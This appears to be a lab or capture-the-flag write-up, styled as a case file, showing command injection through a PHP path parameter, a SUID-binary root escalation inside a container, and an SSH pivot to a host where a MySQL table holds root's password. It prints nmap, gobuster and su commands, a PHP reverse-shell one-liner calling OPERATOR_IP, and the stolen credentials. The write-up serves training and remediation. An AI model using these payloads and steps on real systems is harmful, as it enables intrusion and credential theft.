Case file

PHP path injection, container SUID escape, and internal SSH pivot

Intermediate container engagement: index.php path parameter enabled RCE as www-data; SUID crypt binary dropped root in-container; mike’s SSH key pivoted to host2 where MySQL credentials enabled su to root.

Intermediate30 minLinux · Container · Web · Lateral Movement
01

Engagement summary

External web RCE landed us inside a container. A misplaced SUID binary and a planted SSH key moved us onto an internal host where database credentials completed root.

Against 10.49.172.109, gobuster found index.php accepting a path parameter that listed directories and accepted command injection. A reverse shell as www-data revealed dual interfaces (192.168.250.10 / 172.16.20.2). /usr/share/man/zh_TW/crypt was SUID root and accepted username mike for a root shell. mike’s id_rsa authenticated to 172.16.20.6 (host2). Local MySQL held root’s password for su.

Business impact

Untrusted path handling is RCE. SUID binaries in documentation trees and SSH keys left for lateral movement indicate weak container hardening and secret hygiene across the internal segment.

02

Web enumeration and path-parameter RCE

nmap and gobuster identified index.php. path=/ listed the filesystem; injected PHP opened a reverse shell.

OPERATOR · NMAP

savvy@lab:~$ nmap -sV 10.49.172.109

PORT STATE SERVICE VERSION

22/tcp open tcpwrapped

80/tcp open tcpwrapped

8022/tcp open ssh OpenSSH 8.2p1 Ubuntu

OPERATOR · GOBUSTER

savvy@lab:~$ gobuster dir -u http://10.49.172.109 -x php,txt,html -w directory-list-2.3-medium.txt

/index.php (Status: 200)

/info.php (Status: 200)

OPERATOR · PATH ABUSE

savvy@lab:~$ curl 'http://10.49.172.109/index.php?path=/'

total 28K

<!-- where is the path ? -->

# inject PHP reverse shell via path parameter

savvy@lab:~$ nc -lvnp 1234

savvy@lab:/var/www/html$

PAYLOAD

;php -r '$s=fsockopen("OPERATOR_IP",1234);proc_open("sh",[$s,$s,$s],$p);'
03

In-container privilege escalation

SUID binary /usr/share/man/zh_TW/crypt with argument mike returned a root shell.

OPERATOR · SUID

savvy@lab:~$ find / -user root -perm /4000 2>/dev/null

/usr/share/man/zh_TW/crypt

savvy@lab:~$ /usr/share/man/zh_TW/crypt mike

root@lab:~# whoami

root

root@lab:~# ifconfig

eth0: inet 192.168.250.10

eth1: inet 172.16.20.2

04

SSH pivot and MySQL credential reuse

mike’s id_rsa authenticated to 172.16.20.6. MySQL users table held root’s password for su.

OPERATOR · PIVOT

root@lab:/home/mike$ ssh mike@172.16.20.6 -i .ssh/id_rsa

Welcome to Ubuntu 18.04.5 LTS

savvy@lab:~$ ss -tulnp

tcp LISTEN 127.0.0.1:3306

savvy@lab:~$ mysql -u mike -p

Enter password: password

SQL

show databases;
use accounts;
select * from users;
-- root | bjsig4868fgjjeog
-- mike | ca

OPERATOR · SU ROOT

savvy@lab:~$ su root

Password: bjsig4868fgjjeog

root@lab:~#

Remediation

Parameterize and sanitize path inputs, remove SUID from non-system binaries, do not store SSH private keys for lateral hosts inside containers, and never keep plaintext passwords in MySQL application tables.